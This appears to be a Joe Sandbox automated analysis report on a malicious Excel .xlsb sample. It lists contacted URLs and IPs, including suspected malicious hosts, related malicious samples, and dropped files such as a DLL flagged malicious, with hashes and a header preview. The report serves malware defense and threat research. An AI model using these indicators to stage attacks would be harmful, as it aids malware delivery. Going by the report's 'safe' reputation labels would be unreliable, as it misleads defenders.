                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.odwebp.svc.ms51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://api.powerbi.com/v1.0/myorg/groups51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                    		high
                                                                                    https://web.microsoftstream.com/video/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                      		high
                                                                                      https://graph.windows.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                        		high
                                                                                        https://dataservice.o365filtering.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://officesetup.getmicrosoftkey.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://analysis.windows.net/powerbi/api51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                          		high
                                                                                          https://prod-global-autodetect.acompli.net/autodetect51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://outlook.office365.com/autodiscover/autodiscover.json51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                            		high
                                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                              		high
                                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                		high
                                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                  		high
                                                                                                  http://www.youtube.com/msapplication.xml7.18.drfalse
                                                                                                    		high
                                                                                                    https://ncus.contentsync.51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                      		high
                                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                        		high
                                                                                                        http://weather.service.msn.com/data.aspx51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                          		high
                                                                                                          https://apis.live.net/v5.0/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                            		high
                                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                              		high
                                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                		high
                                                                                                                https://management.azure.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                  		high
                                                                                                                  https://wus2.contentsync.51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://incidents.diagnostics.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                    		high
                                                                                                                    https://clients.config.office.net/user/v1.0/ios51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                      		high
                                                                                                                      http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/{0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                        		high
                                                                                                                        https://o365auditrealtimeingestion.manage.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                          		high
                                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                            		high
                                                                                                                            https://api.office.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                              		high
                                                                                                                              https://incidents.diagnosticssdf.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                		high
                                                                                                                                https://asgsmsproxyapi.azurewebsites.net/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://clients.config.office.net/user/v1.0/android/policies51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.amazon.com/msapplication.xml.18.drfalse
                                                                                                                                    		high
                                                                                                                                    https://entitlement.diagnostics.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://www.twitter.com/msapplication.xml5.18.drfalse
                                                                                                                                          		high
                                                                                                                                          https://outlook.office.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://storage.live.com/clientlogs/uploadlocation51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://templatelogging.office.com/client/log51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://outlook.office365.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://webshell.suite.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://management.azure.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://login.windows.net/common/oauth2/authorize51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://graph.windows.net/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://api.powerbi.com/beta/myorg/imports51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://devnull.onenote.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://ncus.pagecontentsync.51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://messaging.office.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://augloop.office.com/v251B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                                                                                                        		high

                                                                                                                                                                        Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        162.241.24.47
                                                                                                                                                                        		docs.atu.ngr.mybluehost.meUnited States
                                                                                                                                                                        		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                        34.86.224.8
                                                                                                                                                                        		app3.maintorna.comUnited States
                                                                                                                                                                        		15169GOOGLEUSfalse

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                        Analysis ID:403127
                                                                                                                                                                        Start date:03.05.2021
                                                                                                                                                                        Start time:19:47:10
                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 8m 2s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Sample file name:6613n246zm543w.xlsb
                                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                        Number of analysed new started processes analysed:29
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • HDC enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSB@12/59@4/2
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HDC Information:
                                                                                                                                                                        • Successful, ratio: 4.1% (good quality ratio 3.9%)
                                                                                                                                                                        • Quality average: 80.3%
                                                                                                                                                                        • Quality standard deviation: 27.6%
                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                        • Found application associated with file extension: .xlsb
                                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                                        • Scroll down
                                                                                                                                                                        • Close Viewer
                                                                                                                                                                        Warnings:
                                                                                                                                                                        Show All
                                                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.57.81.29, 204.79.197.200, 13.107.21.200, 20.82.209.183, 40.88.32.150, 23.218.209.135, 52.109.76.68, 52.109.76.34, 52.109.8.22, 104.42.151.234, 92.122.213.249, 92.122.213.194, 2.20.142.209, 2.20.142.210, 88.221.62.148, 52.155.217.156, 20.54.26.129, 152.199.19.161
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/403127/sample/6613n246zm543w.xlsb

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        No simulations

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        162.241.24.474Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • docs.atu.ngr.mybluehost.me/presentation.dll

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        docs.atu.ngr.mybluehost.me4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.24.47

                                                                                                                                                                        ASN

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        UNIFIEDLAYER-AS-1USDEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.169.22
                                                                                                                                                                        generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.177.61
                                                                                                                                                                        4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.24.47
                                                                                                                                                                        QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.131.134
                                                                                                                                                                        gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.254.189.182
                                                                                                                                                                        Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.144.13.239
                                                                                                                                                                        0145d964_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.169.22
                                                                                                                                                                        HXxk3mzZeW.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.140.111
                                                                                                                                                                        HCU213DES.docGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.169.22
                                                                                                                                                                        RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.254.236.251
                                                                                                                                                                        a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.221.204
                                                                                                                                                                        Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.129.69
                                                                                                                                                                        FULL SOA $16848.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.113.120
                                                                                                                                                                        BL Draft - HL-88312627.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.254.180.165
                                                                                                                                                                        ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.254.185.244
                                                                                                                                                                        DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                                                        • 74.220.199.6
                                                                                                                                                                        NINGBO_STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.226.148
                                                                                                                                                                        signed contract invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.254.236.251
                                                                                                                                                                        DUBAI UAE HCU4321890.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.169.22
                                                                                                                                                                        Payment Copy 0002.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 50.87.153.37

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        No context

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        C:\Users\Public\block.dll4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll4Y2I7k0.xlsbGet hashmaliciousBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\Public\block.dll
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):312832
                                                                                                                                                                            Entropy (8bit):6.133421258123313
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:92dsJtFrYUZZqrS6HtYP612U8ZIbBmWMOzWb/0:9SsJtFrYJS6NYy123IMWLz5
                                                                                                                                                                            MD5:5A7C87DAB250CEE78CE63AC34117012B
                                                                                                                                                                            SHA1:554C4CCF2341182768D475087D8A8BCFAA525A12
                                                                                                                                                                            SHA-256:8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                                                                                                                                                                            SHA-512:3B4BD7963E3C397618562708064674BD2418F5CAB71CE861986EFA3BCD14FA6B0155DAECE10B9A7AD3FE0F7FAC6FDFD693B4AC2451F4EAABB30BA8253286B7ED
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: 4Y2I7k0.xlsb, Detection: malicious, Browse
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................................................................Rich...........PE..L....Hn`...........!.................;.......................................P............@.........................`...T.......<.... .......................0..........................................@............................................text............................... ..`.data...Hq..........................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0D9072B0-AC38-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29272
                                                                                                                                                                            Entropy (8bit):1.7646610956151878
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:rwZrZa24WSt9if17rlzMJkdVk6JWZBk2pB:rwZrZa24WSt9if17rlzMed66EZBk2pB
                                                                                                                                                                            MD5:F4D7D4225A39DC05E7537055270E85E4
                                                                                                                                                                            SHA1:061334EBAD7D6ACB9CD53936DB7F076F1C0ED065
                                                                                                                                                                            SHA-256:79C546B8A03645805CB89EB6E9E9384F21E93A4FD7A734549C073DE2BAEC4DD9
                                                                                                                                                                            SHA-512:636F7D6D72372D38AB83886B47C672DDCE96DB0D5C6318515C9D671EC12ED2441FB2518BE8092CE430A8BE9D405D86F735A3604519CAB144E8AAADCD49D10A30
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E4D8D27E-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29272
                                                                                                                                                                            Entropy (8bit):1.7737072676409908
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:rOhZFZi2OWGtXuifD01LzMo2jT26/0XB5UpB:ruZFZi2OWGteifQ1LzM3ja6sXB5UpB
                                                                                                                                                                            MD5:A2A6839BDA52A359EE932476EB3034F5
                                                                                                                                                                            SHA1:1C25EA0713E15FCF8B4C32A68E6719FFA90C18C8
                                                                                                                                                                            SHA-256:4F81E35546B3DD8872D9C2FD4CB4DAF52D24B41560D3652CD75DD4C7B9804222
                                                                                                                                                                            SHA-512:2D444EEC7F2F60842AAF8E979AD1F73828B6CE5BEA56F06312BC3A68A1EC8161094863E1E5D46CDA8D8EDA7951CC5B30F208D4C752DAB4BEE70F79C1BDC782F8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FF57CED6-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29272
                                                                                                                                                                            Entropy (8bit):1.7624766566850816
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rzZsZB2kyWkpNtkpJifkpBztzMkpHlW6QhBkeupB:r1Mwkxkp3kpmkpwkp4kP
                                                                                                                                                                            MD5:3C9DBF863282EA3930AC0B86A38E6C4F
                                                                                                                                                                            SHA1:89D97F236492B0126805CE33ECD87EB812209130
                                                                                                                                                                            SHA-256:1DF483DE3B5074599337CF0AF30A9A2D71DCF7FFF969731FA150450A1887B38B
                                                                                                                                                                            SHA-512:86F2073A0D38C789FA3E7726D910F1C1A018AFDDF3071BC9686AC10FE79164D87B5B309F6C1AEAC54E3B2C63CD97339414A347FFF73AD25FF40CEDB0BC1960E7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28160
                                                                                                                                                                            Entropy (8bit):1.922841220511737
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rqoZkpQz6RkMjR2NWQM4pnN/DhfxOVexfN/DhNA:rTzWC+AklAphw4he
                                                                                                                                                                            MD5:B9842DF84F24B4F6FD4FF37192C11BD3
                                                                                                                                                                            SHA1:CCCDD2DB9D5F979159C6A523A40A65BC659911AC
                                                                                                                                                                            SHA-256:E9BE1AA3D7438B043EE470DF16DDB162663263DA5A8F248B97DBACCCC38CDB1C
                                                                                                                                                                            SHA-512:9820138DBC20946BFB7C6D8781D8867B3D68DDB031909AF6DF0E57EFF3A366C6EA8044B032C8E5C099DAB212FB7384671E2E23D3B40800D4E8A1E686803E68C3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):27728
                                                                                                                                                                            Entropy (8bit):1.9388286851838568
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rAZzQhd6Bkxjx2eWvMw5sWjB1Xu1sWjB1XOA:rw8CyNgVkYpzX2pzXp
                                                                                                                                                                            MD5:633ABE828B8481D6C34ED27BABC296D1
                                                                                                                                                                            SHA1:5EA212D8657D344F1DEA9F30B28FCC9E6DC6B796
                                                                                                                                                                            SHA-256:D58FB7E2DBC87EDD9568EC19F17BA0DE663F014AB93625F5F075924CDDFA3F2E
                                                                                                                                                                            SHA-512:C8E04FC92D9EDEC1B493269DCF6165AE62F31297B27CD84BEA9C310C36434D44C30B062751CACCDE5293D4A03169FF8E938CE8ACAA273DC64ADA7D094405964F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28136
                                                                                                                                                                            Entropy (8bit):1.9179455348957073
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rFZrQH6tk8jN2RWKMayU0NFNqhl0NUNFNq+A:rLEaWuEALRU0mFm
                                                                                                                                                                            MD5:7F1981374D28941BDA99E4B415A9C2C2
                                                                                                                                                                            SHA1:C83C83BAC2B4F3EDF2BC87446316EC2C693187C3
                                                                                                                                                                            SHA-256:84C8B65207178301C83F894168FF012B85AF08EE0A8ADCC74EAFB49D866AA3B0
                                                                                                                                                                            SHA-512:3F561DA85CE27611766291375810D5B2218752197EF416D06C47813CAA4F583AC01CBFB70BA07299B19A38D1EDBB3EAC739201D62DF05105D76B754709EB1A67
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                            Entropy (8bit):5.122038663787781
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxOE5A5AbnWimI002EtM3MHdNMNxOE5AsUZnWimI00OYGVbkEtMb:2d6NxOq6mSZHKd6NxOqwSZ7YLb
                                                                                                                                                                            MD5:5C472CC58D7580C71522808204D7AA75
                                                                                                                                                                            SHA1:D726FFAD4848943BDA7FCAC7FC8D6CC33F62332B
                                                                                                                                                                            SHA-256:D6D5492514CDD06CF032B7E675E6323CCE6A24647F1637AF39934E4D813A2299
                                                                                                                                                                            SHA-512:1D9E9EDDC1612DE92D17FC13CF8F4422A7E6C0112547A2768F0EC443EE1C3710FB3BDEDB6659657E8AAD3F83988270B3B63BD392D8907A808B08B4522593A591
                                                                                                                                                                            Malicious:false
